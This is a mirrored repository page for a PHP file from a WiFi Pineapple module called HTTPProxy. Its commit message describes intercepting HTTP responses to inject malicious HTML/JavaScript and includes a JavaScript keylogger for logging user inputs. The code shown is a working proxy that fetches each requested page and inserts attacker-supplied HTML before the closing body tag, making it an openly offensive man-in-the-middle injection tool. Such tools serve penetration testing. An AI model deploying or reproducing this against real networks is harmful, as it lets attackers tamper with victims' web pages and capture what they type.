mirror of
https://github.com/hak5/nano-tetra-modules.git
synced 2025-10-29 16:58:09 +00:00
d613645576
HTTPProxy will allow you to intercept the HTTP response and injection a malicious HTML/JavaScript code, also it has a keylogger written in JavaScript which allows the attacker to log the user inputs
19 lines
521 B
PHP
19 lines
521 B
PHP
<?php
|
|
|
|
// HTTPProxy version 1.0 only handle HTTP Get Request , in the next version we will handle POST requests.
|
|
|
|
header('Content-Type: text/html');
|
|
header_remove('Content-Type');
|
|
|
|
|
|
$url=$_SERVER['HTTP_HOST'];
|
|
$_SERVER['REQUEST_URI'];
|
|
$y=file_get_contents("http://".$url.$_SERVER['REQUEST_URI']);
|
|
|
|
|
|
// read HTML injection
|
|
|
|
$htmlFile = fopen("/pineapple/modules/HTTPProxy/assets/HTML/htmlFile.txt", "r") ;
|
|
$htmlInjection=fread($htmlFile,10000);
|
|
|
|
echo $copy_date = preg_replace("'</body>'", $htmlInjection."</body>", $y); |